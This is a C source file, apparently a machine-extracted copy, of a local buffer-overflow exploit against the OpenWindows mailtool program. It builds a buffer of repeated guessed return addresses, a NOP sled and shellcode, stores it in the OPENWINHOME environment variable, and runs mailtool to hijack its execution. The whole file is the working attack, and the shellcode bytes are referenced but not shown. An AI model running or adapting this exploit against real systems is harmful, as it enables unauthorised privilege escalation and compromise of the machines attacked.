
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ ARCH ;
 int DEFAULT_BUFFER_SIZE ;
 int DEFAULT_OFFSET ;
 int NOP_SIZE ;
 int atoi (char*) ;
 int execv (char*,char**) ;
 int exit (int ) ;
 int get_sp () ;
 char* malloc (int) ;
 int memcpy (char*,char*,int) ;
 int * nop ;
 int printf (char*,...) ;
 int putenv (char*) ;
 int * shellcode ;
 int strlen (int *) ;

int main(int argc, char *argv[])
{
  char *ex[2];
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  printf("Archi: %s\n", (char *)ARCH);

  if (!(buff = malloc(bsize)))
    {
      printf("Can't allocate memory.\n");
      exit(0);
    }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = buff;
  for (i = 0; i < (bsize - strlen(shellcode)) / 2 - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      *(ptr++) = nop[n];
    }


  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  memcpy(buff,"OPENWINHOME=",12);
  putenv(buff);
  printf("Now running: /usr/openwin/bin/mailtool\n");
  ex[0] = "/usr/openwin/bin/mailtool";
  ex[1] = ((void*)0);
  execv(ex[0], ex);
}
